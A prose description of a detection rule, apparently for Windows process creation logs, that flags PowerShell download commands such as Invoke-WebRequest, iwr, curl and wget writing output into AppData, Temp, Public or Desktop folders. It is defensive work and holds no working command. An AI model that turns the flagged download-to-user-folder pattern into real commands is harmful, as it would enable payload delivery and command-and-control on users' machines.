This detection rule identifies potentially malicious activity involving the PowerShell `Invoke-WebRequest` cmdlet, particularly when output files are stored in suspicious directories such as AppData, Desktop, and Temp. Such behavior often indicates an attempt to exfiltrate data or download malicious payloads. The rule detects the execution of PowerShell scripts or commands that include keywords like 'curl', 'Invoke-WebRequest', 'iwr', or 'wget', especially when these commands are coupled with flags indicating output redirection (e.g., '-ur', '-o'). The presence of specific folder paths in the command line (e.g., `%AppData%`, `%Public%`, `%Temp%`, and others) further heightens suspicion of the command being used for unauthorized purposes. Given the rule targets process creation events from Windows, it leverages indicators of potential compromise and is focused on high-risk commands that commonly align with command-and-control activities.